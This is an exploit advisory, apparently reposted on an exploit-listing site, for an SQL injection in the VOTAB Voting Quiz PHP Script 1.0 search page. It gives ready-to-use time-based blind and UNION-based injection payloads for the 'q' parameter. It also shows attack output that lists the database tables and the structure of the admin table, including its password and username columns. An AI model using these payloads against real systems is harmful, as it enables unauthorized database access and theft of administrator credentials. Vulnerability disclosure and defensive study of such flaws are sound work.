Advertisement
C r a C k E r
T H E C R A C K O F E T E R N A L M I G H T
From The Ashes and Dust Rises An Unimaginable crack....
[ Vulnerability ]
: Author : CraCkEr :
Website : codesler.com
Vendor : Codesler - Rohit Chouhan (codester.com)
Software : VOTAB - Voting Quiz PHP Script 1.0
Vuln Type: SQL Injection
Impact : Database Access
: :
Release Notes:
SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/0x0CryptoJob
CraCkEr 2023
Path: /search.php
https://website/search.php?q=[SQLI]
GET parameter 'q' is vulnerable to SQL Injection
---
Parameter: q (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: q=' AND (SELECT 5257 FROM (SELECT(SLEEP(5)))xauk) AND 'xYsK'='xYsK
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: q=' UNION ALL SELECT CONCAT(0x71707a7171,0x53474f4b726f5a754b696a76766959614569735371744d4d6d7a646a7069654b6666795967414a47,0x7176786b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[+] Starting the Attack
fetching current database
current database: '**401**_votab'
fetching tables
+---------------+
| activity |
| admin |
| settings |
| smtp_settings |
| users |
| vote |
| votes |
+---------------+
fetching columns for table 'admin'
[4 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(11) |
| name | text |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+
[-] Done
Copyright ©2023 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.